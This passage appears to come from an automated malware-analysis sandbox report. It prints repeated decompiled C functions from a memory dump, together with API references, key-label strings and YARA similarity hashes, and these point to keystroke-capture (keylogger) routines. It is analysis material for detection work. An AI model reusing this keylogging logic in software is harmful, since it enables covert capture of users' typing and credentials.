				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007574
0x10007574
0x1000757b
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
[Media], xrefs: 10007576
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Media]
API String ID: 783433895-256090921
Opcode ID: 1e0823390995c0d7b20590a1ed7fc42133228cec3a3e15fac83785cecb6d023e
Instruction ID: 1d6d8283b16d110cfc78ae97d037f546bcd25651ecbbde41830c0a0e15c384cb
Opcode Fuzzy Hash: 1e0823390995c0d7b20590a1ed7fc42133228cec3a3e15fac83785cecb6d023e
Instruction Fuzzy Hash: AE31C2B8F042545BF722C7658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45C761

Uniqueness

Uniqueness Score: -1.00%

Function 10007585, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007585(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Left Ctrl]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007585
0x10007585
0x1000758c
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[Left Ctrl], xrefs: 10007587

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Left Ctrl]
API String ID: 783433895-3005955766
Opcode ID: 6e196f45300483c3a4ae03fa75a33ab96228d6b58ef24f6c2d519915bf58e4fe
Instruction ID: 28846d815b0a88ec7f80af092469e54f7a14a72bd487e43e72f76064ef582a80
Opcode Fuzzy Hash: 6e196f45300483c3a4ae03fa75a33ab96228d6b58ef24f6c2d519915bf58e4fe
Instruction Fuzzy Hash: E731BEB8F042545BF722CB658C45B9F73A9FB882C0F50C0A6B5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007596, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007596(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Arrow Left]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007596
0x10007596
0x1000759d
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

[Arrow Left], xrefs: 10007598
Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Arrow Left]
API String ID: 783433895-1177434692
Opcode ID: 5da1957fa9e9ca11a06898b52d5d6c0a4425c8685ea52a547f580b048b1913c6
Instruction ID: 960f23aa8f43220be064e63a19ba5b46ed73888c7d640a2a7c440eaac0204f03
Opcode Fuzzy Hash: 5da1957fa9e9ca11a06898b52d5d6c0a4425c8685ea52a547f580b048b1913c6
Instruction Fuzzy Hash: 5A31C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A6F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100075A7, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100075A7(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Left Alt]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x100075a7
0x100075a7
0x100075ae
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[Left Alt], xrefs: 100075A9

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Left Alt]
API String ID: 783433895-4254496124
Opcode ID: 2cec1b9318e2d2c86633c5b15370c804d0d016b88f7532adb9ff4300fb6f5750
Instruction ID: 3f3db3c1f6d446afdc82a05f0a05d26ced4366bb5cd4d0252c92c5b85f9850ca
Opcode Fuzzy Hash: 2cec1b9318e2d2c86633c5b15370c804d0d016b88f7532adb9ff4300fb6f5750
Instruction Fuzzy Hash: DA31B0B8B042545BF722C7658C45B9F73A9FB882C0F50C0A5B5489720ECA78EE458761

Uniqueness

Uniqueness Score: -1.00%

Function 100075B8, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100075B8(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Next Track]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x100075b8
0x100075b8
0x100075bf
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[Next Track], xrefs: 100075BA

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Next Track]
API String ID: 783433895-2289579739
Opcode ID: 4bb0c2166a23f48689fc7f19d14cbfaf811bbbb3efc322fb13dea8c573a2909b
Instruction ID: d5362d4f7291d6c897a022562f4ff387a401af9e6337d31ccc62730f376386c9
Opcode Fuzzy Hash: 4bb0c2166a23f48689fc7f19d14cbfaf811bbbb3efc322fb13dea8c573a2909b
Instruction Fuzzy Hash: 8731C0B8F042545BF722DB658C45B9F73A9FB882C0F50C0A6F5489724ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100075C9, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100075C9(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Play / Pause]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x100075c9
0x100075c9
0x100075d0
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[Play / Pause], xrefs: 100075CB

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Play / Pause]
API String ID: 783433895-1618082066
Opcode ID: 574edec8092f91f95576e93fb39d4c139960eca42ee1905eafac8136fd6412dc
Instruction ID: 996c3445bb2b0b98ef0d408312881446d9d9f055120b4c6d947ec6de027f53a4
Opcode Fuzzy Hash: 574edec8092f91f95576e93fb39d4c139960eca42ee1905eafac8136fd6412dc
Instruction Fuzzy Hash: 6631C2B8F042545BF722D7658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45C761

Uniqueness

Uniqueness Score: -1.00%

Function 100075DA, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

